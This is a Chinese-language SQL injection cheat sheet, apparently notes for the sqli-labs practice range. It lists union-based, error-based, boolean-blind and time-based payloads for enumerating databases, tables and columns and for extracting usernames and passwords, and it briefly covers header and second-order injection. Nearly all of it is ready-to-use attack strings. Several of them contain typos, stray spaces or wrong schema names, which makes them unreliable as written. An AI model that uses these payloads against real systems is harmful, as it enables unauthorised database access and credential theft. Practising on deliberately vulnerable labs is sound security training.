以sqli-labs靶場為例
一、聯合查詢注入(UNION query SQL injection)
order by x 判斷列數
union select 1,2,3 查看顯示位
爆破數據庫版本,和當前數據庫名稱
union select 1,version(),database() --+
爆破庫名:
union select 1,2,concat(schema_name) from information_schema.schema limit 0,1 --+(一個)
union select 1,2,group_concat(schema_name) from information_schema.schema --+ (所有)
爆破表名:
union select 1,database(),(select group_concat(table_name) from information_name.tables where table_name=database()) --+
爆破列名:
union select 1,database(),(select group_concat(column_name) from information_schema. tables where tables_schema = database() and table_name = ‘users’) --+
爆破數據:
union select 1,(select group_concat(id) from users),(select group_concat(username) fro m users) --+
二、報錯注入(Error-based SQL injection)
extractvalue():
爆破數據:
extractvalue(1,concat(0x7e,database(),0x7e),3) --+
爆破庫名:
extractvalue(1,concat(0x7e,(select schema_name from information_schema.schema),0x7 e)) --+
爆破表名:
extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where t able_schema = database()),0x7e)) --+
爆破列名:
extractvalue(1,concat(0x7e,(select column_name from information_schema.columns whe re schema_name=database() and table_name=’users’),0x7e),3) --+
爆破數據:
extractvalue(1,concat(0x7e,(select concat(id,0x7e,username,0x7e,password from users)),0 x7e),3) --+
updataxml():
同extractvalue()函數
floor():
and (select 1 from (select count(*),concat((select (select (SELECT distinct ‘sqly語句’)) from information_schema.tables),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
三、布爾型注入(Boolean-based blind SQL injection)
1)判斷長度
1.判斷當前數據庫的長度
and length(database())=8 --+
2.判斷當前數據庫里有幾張表
and ((select count(*) from information_schema.tables where table_schema = database ())=4) --+
3.判斷每張表的長度
and length((select table_name from information_schema.tables where table_schema=d atabase() limit 0,1))=6 --+
4.判斷某張表的列數
and ((select count(*) from information_schema.columns where table_schema=database () and table_name=(select table_name from information_schema.tables where table_sc hema=database() limit 3,1))=3) --+
5.判斷某張表里對應的字段的數據的長度
and length((select username from users where id =1))=4 --+
and length((select password from users where id =1))=4 --+
2)猜測內容
1.猜測當前數據庫的名字:
and ascii(substr((select database()),1) =115 --+
2.猜測某張表的表名:
and ascii(substr((select table_name from information_schema.tables where table_sche ma=database() limit 3,1),5))=115 --+
3.猜測某張表的某個列名:
and ascii(substr((select column_name from information_schema.columns where table_s chema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 3,1) limit 1,1),8))=101 --+
4.猜測某張表里列名為username的數據
and ascii(substr((select username from users limit 0,1),1)) = 68 --+
四、延時注入(Time-based blind SQL injection)
1.注入點判斷
and sleep(5) --+
2. if(表達式,值1,值2)
可以與盲注結合,形成基於時間的盲注
and if(length(database())=8,sleep(5),1) --+
五、堆疊注入,可多語句查詢注入(Stacked queries SQL injection)
六、http頭部注入
1.User-Agent 頭字段注入
2.Referer 頭字段注入
3.Cookie 頭字段注入
4.二次注入
1、創建一個 對應的用戶 ’#。改這個新創建的用戶的密碼。對應的用戶密碼就會被更 改,這個新建的用戶的面膜沒有被更改